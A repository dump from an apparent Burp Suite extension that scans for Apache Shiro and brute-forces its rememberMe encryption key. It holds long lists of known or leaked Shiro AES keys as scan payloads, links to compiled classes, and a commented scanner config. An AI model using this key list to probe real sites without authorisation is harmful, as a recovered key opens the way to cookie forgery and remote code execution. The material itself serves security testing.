249 | - "25BsmdYwjnfcWmnhAciDDg=="
250 | - "3JvYhmBLUs0ETA5Kprsdag=="
251 | - "5AvVhmFLUs0KTA3Kprsdag=="
252 | - "6AvVhmFLUs0KTA3Kprsdag=="
253 | - "6NfXkC7YVCV5DASIrEm1Rg=="
254 | - "cmVtZW1iZXJNZQAAAAAAAA=="
255 | - "8AvVhmFLUs0KTA3Kprsdag=="
256 | - "8BvVhmFLUs0KTA3Kprsdag=="
257 | - "9AvVhmFLUs0KTA3Kprsdag=="
258 | - "OUHYQzxQ/W9e/UjiAGu6rg=="
259 | - "aU1pcmFjbGVpTWlyYWNsZQ=="
260 | - "bXRvbnMAAAAAAAAAAAAAAA=="
261 | - "5J7bIJIV0LQSN3c9LPitBQ=="
262 | - "bya2HkYo57u6fWh5theAWw=="
263 | - "f/SY5TIve5WWzT4aQlABJA=="
264 | - "WuB+y2gcHRnY2Lg9+Aqmqg=="
265 | - "3qDVdLawoIr1xFd6ietnwg=="
266 | - "YI1+nBV//m7ELrIyDHm6DQ=="
267 | - "6Zm+6I2j5Y+R5aS+5ZOlAA=="
268 | - "2A2V+RFLUs+eTA3Kpr+dag=="
269 | - "6ZmI6I2j3Y+R1aSn5BOlAA=="
270 | - "SkZpbmFsQmxhZGUAAAAAAA=="
271 | - "2cVtiE83c4lIrELJwKGJUw=="
272 | - "fsHspZw/92PrS3XrPW+vxw=="
273 | - "XTx6CKLo/SdSgub+OPHSrw=="
274 | - "sHdIjUN6tzhl8xZMG3ULCQ=="
275 | - "O4pdf+7e+mZe8NyxMTPJmQ=="
276 | - "HWrBltGvEZc14h9VpMvZWw=="
277 | - "rPNqM6uKFCyaL10AK51UkQ=="
278 | - "Y1JxNSPXVwMkyvES/kJGeQ=="
279 | - "lT2UvDUmQwewm6mMoiw4Ig=="
280 | - "MPdCMZ9urzEA50JDlDYYDg=="
281 | - "xVmmoltfpb8tTceuT5R7Bw=="
282 | - "c+3hFGPjbgzGdrC+MHgoRQ=="
283 | - "ClLk69oNcA3m+s0jIMIkpg=="
284 | - "Bf7MfkNR0axGGptozrebag=="
285 | - "1tC/xrDYs8ey+sa3emtiYw=="
286 | - "ZmFsYWRvLnh5ei5zaGlybw=="
287 | - "cGhyYWNrY3RmREUhfiMkZA=="
288 | - "IduElDUpDDXE677ZkhhKnQ=="
289 | - "yeAAo1E8BOeAYfBlm4NG9Q=="
290 | - "cGljYXMAAAAAAAAAAAAAAA=="
291 | - "2itfW92XazYRi5ltW0M2yA=="
292 | - "XgGkgqGqYrix9lI6vxcrRw=="
293 | - "ertVhmFLUs0KTA3Kprsdag=="
294 | - "5AvVhmFLUS0ATA4Kprsdag=="
295 | - "s0KTA3mFLUprK4AvVhsdag=="
296 | - "hBlzKg78ajaZuTE0VLzDDg=="
297 | - "9FvVhtFLUs0KnA3Kprsdyg=="
298 | - "d2ViUmVtZW1iZXJNZUtleQ=="
299 | - "yNeUgSzL/CfiWw1GALg6Ag=="
300 | - "NGk/3cQ6F5/UNPRh8LpMIg=="
301 | - "4BvVhmFLUs0KTA3Kprsdag=="
302 | - "MzVeSkYyWTI2OFVLZjRzZg=="
303 | - "CrownKey==a12d/dakdad"
304 | - "empodDEyMwAAAAAAAAAAAA=="
305 | - "A7UzJgh1+EWj5oBFi+mSgw=="
306 | - "c2hpcm9fYmF0aXMzMgAAAA=="
307 | - "i45FVt72K2kLgvFrJtoZRw=="
308 | - "66v1O8keKNV3TTcGPK1wzg=="
309 | - "U3BAbW5nQmxhZGUAAAAAAA=="
310 | - "ZnJlc2h6Y24xMjM0NTY3OA=="
311 | - "Jt3C93kMR9D5e8QzwfsiMw=="
312 | - "MTIzNDU2NzgxMjM0NTY3OA=="
313 | - "vXP33AonIp9bFwGl7aT7rA=="
314 | - "V2hhdCBUaGUgSGVsbAAAAA=="
315 | - "Q01TX0JGTFlLRVlfMjAxOQ=="
316 | - "Is9zJ3pzNh2cgTHB4ua3+Q=="
317 | - "SDKOLKn2J1j/2BHjeZwAoQ=="
318 | - "NsZXjXVklWPZwOfkvk6kUA=="
319 | - "GAevYnznvgNCURavBhCr1w=="
320 | - "zSyK5Kp6PZAAjlT+eeNMlg=="
321 | - "bXdrXl9eNjY2KjA3Z2otPQ=="
322 | - "RVZBTk5JR0hUTFlfV0FPVQ=="
323 | - "WkhBTkdYSUFPSEVJX0NBVA=="
324 | - "GsHaWo4m1eNbE0kNSMULhg=="
325 | - "l8cc6d2xpkT1yFtLIcLHCg=="
326 | - "KU471rVNQ6k7PQL4SqxgJg=="
327 | - "kPH+bIxk5D2deZiIxcabaA=="
328 | - "kPH+bIxk5D2deZiIxcacaA=="
329 | - "4AvVhdsgUs0F563SDFAdag=="
330 | - "FL9HL9Yu5bVUJ0PDU1ySvg=="
331 | - "fdCEiK9YvLC668sS43CJ6A=="
332 | - "FJoQCiz0z5XWz2N2LyxNww=="
333 | - "HeUZ/LvgkO7nsa18ZyVxWQ=="
334 | - "HoTP07fJPKIRLOWoVXmv+Q=="
335 | - "iycgIIyCatQofd0XXxbzEg=="
336 | - "m0/5ZZ9L4jjQXn7MREr/bw=="
337 | - "NoIw91X9GSiCrLCF03ZGZw=="
338 | - "oPH+bIxk5E2enZiIxcqaaA=="
339 | - "QAk0rp8sG0uJC4Ke2baYNA=="
340 | - "Rb5RN+LofDWJlzWAwsXzxg=="
341 | - "s2SE9y32PvLeYo+VGFpcKA=="
342 | - "SrpFBcVD89eTQ2icOD0TMg=="
343 | - "Us0KvVhTeasAm43KFLAeng=="
344 | - "YWJjZGRjYmFhYmNkZGNiYQ=="
345 | - "zIiHplamyXlVB11UXWol8g=="
346 | - "ZjQyMTJiNTJhZGZmYjFjMQ=="
347 | - "2adsfasdqerqerqewradsf=="
348 | - "2AvVCXsxUs0FSA7SYFjdQg=="
349 | - "2AvVhdsgERdsSA3SDFAdag=="
350 | - "2AvVhdsgUs0FSA3SaFAdfg=="
351 | - "2AvVhdsgUs0FSA3SDFAder=="
352 | - "2AvVhdsgUsOFSA3SDFAdag=="
353 | - "2AvVhmFLUs0KTA3Kprsdag=="
354 | - "2AvVidsaUSofSA3SDFAdog=="
355 | - "3Av2hmFLAs0BTA3Kprsd6E=="
356 | - "3AvVhdAgUs1FSA4SDFAdBg=="
357 | - "3AvVhMFLIs0KTA3Kprsdag=="
358 | - "3AvVhmFLUs0KTA3KaTHGFg=="
359 | - "3qDVdLawoIr1xFd6ietnsg=="
360 | - "3rvVhmFLUs0KAT3Kprsdag=="
361 | - "4AvVhm2LUs0KTA3Kprsdag=="
362 | - "4AvVhmFLUs0KTA3KAAAAAA=="
363 | - "4AvVhmFLUs0KTA3Kprseaf=="
364 | - "4AvVhmFLUs0TTA3Kprsdag=="
365 | - "4AvVhmFLUs5KTA1Kprsdag=="
366 | - "4AvVhmFLUsOKTA3Kprsdag=="
367 | - "4rvVhmFLUs0KAT3Kprsdag=="
368 | - "4WCZSJyqdUQsije93aQIRg=="
369 | - "5AvVhCsgUs0FSA3SDFAdag=="
370 | - "5oiR5piv5p2h5ZK46bG8IQ=="
371 | - "8AvVhdsgUs0FSA3SDFAdag=="
372 | - "9Ami6v2G5Y+r5aPnE4OlBB=="
373 | - "9AVvhnFLuS3KTV8KprsdAg=="
374 | - "AF05JAuyuEB1ouJQ9Y9Phg=="
375 | - "aG91c2Vob3VzZWhvdXNlMg=="
376 | - "A+kWR7o9O0/G/W6aOGesRA=="
377 | - "AztiX2RUqhc7dhOzl1Mj8Q=="
378 | - "b2EAAAAAAAAAAAAAAAAAAA=="
379 | - "B9rPF8FHhxKJZ9k63ik7kQ=="
380 | - "c2hvdWtlLXBsdXMuMjAxNg=="
381 | - "Cj6LnKZNLEowAZrdqyH/Ew=="
382 | - "duhfin37x6chw29jsne45m=="
383 | - "fCq+/xW488hMTCE+cmJ3FF=="
384 | - "FjbNm1avvGmWE9CY2HqV75=="
385 | - "GhrF5zLfq1Dtadd1jlohhA=="
386 | - "GHxH6G3LFh8Zb3NwoRgfFA=="
387 | - "HOlg7NHb9potm0n5s4ic0Q=="
388 | - "lt181dcQVz/Bo9Wb8ws/Cg=="
389 | - "M2djA70UBBUPDibGZBRvrA=="
390 | - "mIccZhQt6EBHrZIyw1FAXQ=="
391 | - "pbnA+Qzen1vjV3rNqQBLHg=="
392 | - "pyyX1c5x2f0LZZ7VKZXjKO=="
393 | - "QDFCnfkLUs0KTA3Kprsdag=="
394 | - "QF5HMyZAWDZYRyFnSGhTdQ=="
395 | - "qQFtSnnj/sx7vu51ixAyEQ=="
396 | - "QUxQSEFNWVNPRlRCVUlMRA=="
397 | - "QVN1bm5uJ3MgU3Vuc2l0ZQ=="
398 | - "R29yZG9uV2ViAAAAAAAAAA=="
399 | - "sBv2t3okbdm3U0r2EVcSzB=="
400 | - "sgIQrqUVxa1OZRRIK3hLZw=="
401 | - "TGMPe7lGO/Gbr38QiJu1/w=="
402 | - "w793pPq5ZVBKkj8OhV4KaQ=="
403 | - "wrjUh2ttBPQLnT4JVhriug=="
404 | - "wyLZMDifwq3sW1vhhHpgKA=="
405 | - "YnlhdnMAAAAAAAAAAAAAAA=="
406 | - "YVd4dmRtVjViM1UlM0QIdn=="
407 | - "YWdlbnRAZG1AMjAxOHN3Zg=="
408 | - "YystomRZLMUjiK0Q1+LFdw=="
409 | - "Z3VucwAAAAAAAAAAAAABBB=="
410 | - "Z3VucwACAOVAKALACAADSA=="
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/AShiroCipherKeyExtension.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/AShiroCipherKeyExtension.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/IShiroCipherKeyExtension.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionInterface/IShiroCipherKeyExtension.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionMethod/ShiroCipherKeyScan.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ExtensionMethod/ShiroCipherKeyScan.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroCipherKeyExtension/ShiroCipherKey.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ShiroCipherKey.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroCipherKeyExtension/ShiroCipherKeyThread.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroCipherKeyExtension/ShiroCipherKeyThread.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionInterface/AShiroFingerprintExtension.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionInterface/AShiroFingerprintExtension.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionInterface/IShiroFingerprintExtension.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionInterface/IShiroFingerprintExtension.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint1.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint2.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint3.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint3.class
--------------------------------------------------------------------------------
/target/classes/burp/Application/ShiroFingerprintExtension/ShiroFingerprint.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Application/ShiroFingerprintExtension/ShiroFingerprint.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/CustomBurpHelpers.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/CustomBurpHelpers.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/CustomBurpUrl.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/CustomBurpUrl.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/CustomHelpers.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/CustomHelpers.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/DiffPage.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/DiffPage.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/Encrypt/CbcEncrypt.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/Encrypt/CbcEncrypt.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/Encrypt/EncryptInterface.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/Encrypt/EncryptInterface.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/Encrypt/GcmEncrypt.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/Encrypt/GcmEncrypt.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/GlobalPassiveScanVariableReader.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/GlobalPassiveScanVariableReader.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/GlobalVariableReader.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/GlobalVariableReader.class
--------------------------------------------------------------------------------
/target/classes/burp/Bootstrap/YamlReader.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Bootstrap/YamlReader.class
--------------------------------------------------------------------------------
/target/classes/burp/BurpExtender.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/BurpExtender.class
--------------------------------------------------------------------------------
/target/classes/burp/Config.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Config.class
--------------------------------------------------------------------------------
/target/classes/burp/ConfigDlg$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/ConfigDlg$1.class
--------------------------------------------------------------------------------
/target/classes/burp/ConfigDlg.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/ConfigDlg.class
--------------------------------------------------------------------------------
/target/classes/burp/CustomErrorException/DiffPageException.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/CustomErrorException/DiffPageException.class
--------------------------------------------------------------------------------
/target/classes/burp/CustomErrorException/TaskTimeoutException.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/CustomErrorException/TaskTimeoutException.class
--------------------------------------------------------------------------------
/target/classes/burp/CustomScanIssue.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/CustomScanIssue.class
--------------------------------------------------------------------------------
/target/classes/burp/Encrypt.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Encrypt.class
--------------------------------------------------------------------------------
/target/classes/burp/Menu$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$1.class
--------------------------------------------------------------------------------
/target/classes/burp/Menu$2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$2.class
--------------------------------------------------------------------------------
/target/classes/burp/Menu$3.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$3.class
--------------------------------------------------------------------------------
/target/classes/burp/Menu$4.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$4.class
--------------------------------------------------------------------------------
/target/classes/burp/Menu$5.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$5.class
--------------------------------------------------------------------------------
/target/classes/burp/Menu$6.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$6.class
--------------------------------------------------------------------------------
/target/classes/burp/Menu$7.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu$7.class
--------------------------------------------------------------------------------
/target/classes/burp/Menu.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Menu.class
--------------------------------------------------------------------------------
/target/classes/burp/Ui/BaseSettingTag.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/BaseSettingTag.class
--------------------------------------------------------------------------------
/target/classes/burp/Ui/ScanQueueTag$TablesData.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/ScanQueueTag$TablesData.class
--------------------------------------------------------------------------------
/target/classes/burp/Ui/ScanQueueTag$URLTable.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/ScanQueueTag$URLTable.class
--------------------------------------------------------------------------------
/target/classes/burp/Ui/ScanQueueTag.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/ScanQueueTag.class
--------------------------------------------------------------------------------
/target/classes/burp/Ui/Tags.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Ui/Tags.class
--------------------------------------------------------------------------------
/target/classes/burp/Utils$SilentURLStreamHandler.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Utils$SilentURLStreamHandler.class
--------------------------------------------------------------------------------
/target/classes/burp/Utils.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S9MF/ShiroScan2/b419d57275c54b094905cc9e46d8a9c0e7d52f45/target/classes/burp/Utils.class
--------------------------------------------------------------------------------
/target/classes/config.yml:
--------------------------------------------------------------------------------
1 | # 插件启动项
2 | isStart: true
3 |
4 | # 消息等级
5 | # 用于插件扫描队列界面的显示
6 | # ALL = 显示所有消息
7 | # PIVOTAL = 只显示关键信息,只显示所有前缀带"[+]/[-]/[x]/[*]"的信息
8 | # 注: 乱输等于 PIVOTAL
9 | messageLevel: "PIVOTAL"
10 |
11 | # 扫描配置
12 | scan:
13 | # 站点扫描次数
14 | # 超过次数以后就不在对该站点进行扫描了
15 | # 0 表示无限次扫描
16 | siteScanNumber: 0
17 | # 域名扫描规则
18 | domainName:
19 | # 域名黑名单
20 | # 注: 黑名单优先级最高
21 | # 注: 为空表示关闭该功能
22 | # 使用规则:
23 | # 1. 过滤某个域名: www.domain1.com
24 | # 2. 过滤某个域名的全部子域名: *.domain2.com
25 | # 3. 过滤某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com
26 | # 使用方法:
27 | # blacklist:
28 | # - "www.domain1.com"
29 | # - "*.domain2.com"
30 | blacklist:
31 | - "*.dnslog.cn"
32 | - "*.ceye.io"
33 | - "*.fofa.so"
34 | - "*.shodan.io"
35 | - "*.github.com"
36 | - "*.fofa.info"
37 | - "*.nosec.org"
38 | # 域名白名单
39 | # 注: 黑名单优先级最高
40 | # 注: 为空表示关闭该功能
41 | # 使用规则:
42 | # 1. 只扫描某个域名: www.domain1.com
43 | # 2. 只扫描某个域名的全部子域名: *.domain2.com
44 | # 3. 只扫描某个域名的部分子域名: a.*.domain2.com/*.a.*.domain2.com
45 | # 使用方法:
46 | # whitelist:
47 | # - "www.domain1.com"
48 | # - "*.domain2.com"
49 | whitelist:
50 |
51 | # url黑名单后缀
52 | # url的后缀出现这些字段的都不进行测试
53 | urlBlackListSuffix:
54 | config:
55 | isStart: true
56 | suffixList:
57 | - "3g2"
58 | - "3gp"
59 | - "7z"
60 | - "aac"
61 | - "abw"
62 | - "aif"
63 | - "aifc"
64 | - "aiff"
65 | - "arc"
66 | - "au"
67 | - "avi"
68 | - "azw"
69 | - "bin"
70 | - "bmp"
71 | - "bz"
72 | - "bz2"
73 | - "cmx"
74 | - "cod"
75 | - "csh"
76 | - "css"
77 | - "csv"
78 | - "doc"
79 | - "docx"
80 | - "eot"
81 | - "epub"
82 | - "gif"
83 | - "gz"
84 | - "ico"
85 | - "ics"
86 | - "ief"
87 | - "jar"
88 | - "jfif"
89 | - "jpe"
90 | - "jpeg"
91 | - "jpg"
92 | - "m3u"
93 | - "mid"
94 | - "midi"
95 | - "mjs"
96 | - "mp2"
97 | - "mp3"
98 | - "mpa"
99 | - "mpe"
100 | - "mpeg"
101 | - "mpg"
102 | - "mpkg"
103 | - "mpp"
104 | - "mpv2"
105 | - "odp"
106 | - "ods"
107 | - "odt"
108 | - "oga"
109 | - "ogv"
110 | - "ogx"
111 | - "otf"
112 | - "pbm"
113 | - "pdf"
114 | - "pgm"
115 | - "png"
116 | - "pnm"
117 | - "ppm"
118 | - "ppt"
119 | - "pptx"
120 | - "ra"
121 | - "ram"
122 | - "rar"
123 | - "ras"
124 | - "rgb"
125 | - "rmi"
126 | - "rtf"
127 | - "snd"
128 | - "svg"
129 | - "swf"
130 | - "tar"
131 | - "tif"
132 | - "tiff"
133 | - "ttf"
134 | - "vsd"
135 | - "wav"
136 | - "weba"
137 | - "webm"
138 | - "webp"
139 | - "woff"
140 | - "woff2"
141 | - "xbm"
142 | - "xls"
143 | - "xlsx"
144 | - "xpm"
145 | - "xul"
146 | - "xwd"
147 | - "zip"
148 | - "js"
149 | - "wmv"
150 | - "asf"
151 | - "asx"
152 | - "rm"
153 | - "rmvb"
154 | - "mp4"
155 | - "mov"
156 | - "m4v"
157 | - "dat"
158 | - "mkv"
159 | - "flv"
160 | - "vob"
161 | - "txt"
162 | - "php"
163 | - "asp"
164 |
165 | # 应用程序配置
166 | application:
167 | # shiro指纹扩展
168 | shiroFingerprintExtension:
169 | config:
170 | # shiro指纹问题数量
171 | # 表示可以接收同一个站点多少个问题个数
172 | # 超过次数以后就不在对该站点进行扫描了
173 | # 0 表示无限次接收
174 | issueNumber: 3
175 | # 问题名称
176 | issueName: "ShiroFramework"
177 | # shiro加密key扩展
178 | shiroCipherKeyExtension:
179 | config:
180 | # 插件启动项
181 | isStart: true
182 | # 用于判断是否扫描Cbc加密的问题
183 | isScanCbcEncrypt: true
184 | # 用于判断是否扫描Gcm加密的问题
185 | isScanGcmEncrypt: true
186 | # shiro加密key泄漏问题数量
187 | # 表示可以接收同一个站点多少个问题个数
188 | # 超过次数以后就不在对该站点进行扫描了
189 | # 0 表示无限次接收
190 | issueNumber: 1
191 | # 程序运行的最大线程总数
192 | # 最小值为1, 小于等于0, 会重置为1
193 | # 注意:
194 | # 会自动根据输入的shiro加密key总数,来动态启动线程执行任务
195 | # 设置4的话,意思是最多可以开几个线程来执行任务的意思
196 | threadTotal: 4
197 | # 相似度比例
198 | # 1 = 100%, 0.7 = 70%
199 | # 主要用来 shiro跑key请求 对比 原请求 与 必定错误key请求相似度 低于多少会被认为不存在该问题
200 | # 例如:
201 | # shiro跑key请求 与 原请求 相似度低于0.7则认为不存在该问题
202 | # shiro跑key请求 与 必定错误key请求相似度 相似度低于0.7则认为不存在该问题
203 | similarityRatio: 0.7
204 | # 提供商
205 | # 声明使用 Application.ShiroCipherKeyExtension.ExtensionMethod 的哪个类,为该扩展提供服务
206 | provider: "ShiroCipherKeyScan"
207 | # 问题名称
208 | issueName: "ShiroCipherKey"
209 | payloads:
210 | - "kPH+bIxk5D2deZiIxcaaaA=="
211 | - "Z3VucwAAAAAAAAAAAAAAAA=="
212 | - "wGiHplamyXlVB11UXWol8g=="
213 | - "2AvVhdsgUs0FSA3SDFAdag=="
214 | - "3AvVhmFLUs0KTA3Kprsdag=="
215 | - "4AvVhmFLUs0KTA3Kprsdag=="
216 | - "bWljcm9zAAAAAAAAAAAAAA=="
217 | - "WcfHGU25gNnTxTlmJMeSpw=="
218 | - "fCq+/xW488hMTCD+cmJ3aQ=="
219 | - "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN"
220 | - "6ZmI6I2j5Y+R5aSn5ZOlAA=="
221 | - "1QWLxg+NYmxraMoxAXu/Iw=="
222 | - "a2VlcE9uR29pbmdBbmRGaQ=="
223 | - "5aaC5qKm5oqA5pyvAAAAAA=="
224 | - "1AvVhdsgUs0FSA3SDFAdag=="
225 | - "5RC7uBZLkByfFfJm22q/Zw=="
226 | - "3AvVhdAgUs0FSA4SDFAdBg=="
227 | - "a3dvbmcAAAAAAAAAAAAAAA=="
228 | - "eXNmAAAAAAAAAAAAAAAAAA=="
229 | - "U0hGX2d1bnMAAAAAAAAAAA=="
230 | - "Ymx1ZXdoYWxlAAAAAAAAAA=="
231 | - "L7RioUULEFhRyxM7a2R/Yg=="
232 | - "UGlzMjAxNiVLeUVlXiEjLw=="
233 | - "bWluZS1hc3NldC1rZXk6QQ=="
234 | - "ZUdsaGJuSmxibVI2ZHc9PQ=="
235 | - "7AvVhmFLUs0KTA3Kprsdag=="
236 | - "MTIzNDU2Nzg5MGFiY2RlZg=="
237 | - "OY//C4rhfwNxCQAQCrQQ1Q=="
238 | - "bTBANVpaOUw0ampRWG43TVJFcF5iXjdJ"
239 | - "FP7qKJzdJOGkzoQzo2wTmA=="
240 | - "nhNhwZ6X7xzgXnnZBxWFQLwCGQtJojL3"
241 | - "LEGEND-CAMPUS-CIPHERKEY=="
242 | - "r0e3c16IdVkouZgk1TKVMg=="
243 | - "ZWvohmPdUsAWT3=KpPqda"
244 | - "k3+XHEg6D8tb2mGm7VJ3nQ=="
245 | - "U3ByaW5nQmxhZGUAAAAAAA=="
246 | - "tiVV6g3uZBGfgshesAQbjA=="
247 | - "ZAvph3dsQs0FSL3SDFAdag=="
248 | - "0AvVhmFLUs0KTA3Kprsdag=="
